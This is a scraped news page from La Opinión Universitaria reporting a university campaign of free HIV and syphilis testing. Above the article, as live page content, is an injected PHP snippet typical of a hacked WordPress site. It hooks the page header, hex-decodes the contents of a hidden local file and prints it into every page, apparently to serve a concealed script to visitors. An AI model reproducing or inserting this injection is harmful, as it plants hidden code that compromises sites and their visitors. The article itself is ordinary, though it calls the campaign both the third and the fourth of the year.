if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Realiza DAU la campaña ¡Yo decido hacerme la prueba! – La Opinión Universitaria La Opinión Universitaria
Menu

Realiza DAU la campaña ¡Yo decido hacerme la prueba!

  • Se trata de la tercera del año, en la cual se aplicaron cerca de mil pruebas para detección de SIDA y sífilis

Con la aplicación de alrededor de mil pruebas, este miércoles se realizó la campaña ¡Yo decido hacerme la prueba!, para la detección de VIH y sífilis, en la explanada de la Dirección de Acompañamiento Universitario (DAU), en CU.

          Con la colaboración del Centro Ambulatorio para la Prevención y Atención del SIDA e Infecciones de Transmisión Sexual (Capasits) tuvo lugar la edición 24 y la cuarta del año. Se trata de pruebas rápidas, gratuitas, cuyos resultados se informan en 15 minutos después de su aplicación.

          Participaron alrededor de 20  médicos pasantes y de servicio social asignados a la Coordinación y Prevención de la Salud de la DAU, psicólogos y personal de Capasits. Además, se estableció un módulo del Observatorio sobre Violencia de Género en Medios de Comunicación, instancia que participó con pláticas informativas.

  • No comments

    Deja una respuesta

    Tweets recientes